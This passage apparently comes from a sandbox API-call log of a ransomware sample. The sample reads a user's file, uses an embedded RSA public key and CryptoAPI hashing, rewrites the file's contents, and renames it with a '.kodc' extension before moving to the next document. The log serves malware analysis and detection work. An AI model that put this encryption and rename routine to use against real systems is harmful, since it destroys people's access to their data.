lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.026] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.026] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x18abd, lpOverlapped=0x0) returned 1 [0098.027] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.027] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.027] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.027] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.028] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.028] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.028] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.028] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.028] GetLastError () returned 0x0 [0098.028] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.028] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.028] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.028] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.029] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18ac0) returned 0x9ba4d90 [0098.029] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340380 [0098.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7d8 [0098.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33403c8 [0098.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7f0 [0098.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a820 [0098.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a838 [0098.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.030] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a820 | out: hHeap=0x630000) returned 1 [0098.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a838 | out: hHeap=0x630000) returned 1 [0098.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a838 [0098.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a820 [0098.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0098.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0098.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a838 | out: hHeap=0x630000) returned 1 [0098.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a820 | out: hHeap=0x630000) returned 1 [0098.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.031] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.032] GetCurrentThreadId () returned 0x42c [0098.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x6968d8 [0098.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.032] GetCurrentThreadId () returned 0x42c [0098.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a820 [0098.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a838 [0098.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a808 [0098.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a850 [0098.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0098.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a820 | out: hHeap=0x630000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a820 [0098.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0098.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0098.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a820 | out: hHeap=0x630000) returned 1 [0098.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a850 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a838 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a808 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7f0 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33403c8 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.038] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x18ab8, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x18ab8, lpOverlapped=0x0) returned 1 [0098.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.039] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18abd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.039] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0098.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0098.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.039] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.040] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.040] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.040] CloseHandle (hObject=0x5cc) returned 1 [0098.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0098.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0098.041] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5yCEZc_6.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5ycezc_6.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5yCEZc_6.csv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5ycezc_6.csv.kodc")) returned 1 [0098.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.042] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.044] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf40f620, ftCreationTime.dwHighDateTime=0x1d5c50f, ftLastAccessTime.dwLowDateTime=0xf0762ce0, ftLastAccessTime.dwHighDateTime=0x1d5b94b, ftLastWriteTime.dwLowDateTime=0xf0762ce0, ftLastWriteTime.dwHighDateTime=0x1d5b94b, nFileSizeHigh=0x0, nFileSizeLow=0x10700, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6JU8bcP.rtf", cAlternateFileName="")) returned 1 [0098.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.044] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6JU8bcP.rtf") returned=".rtf" [0098.044] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6JU8bcP.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6ju8bcp.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 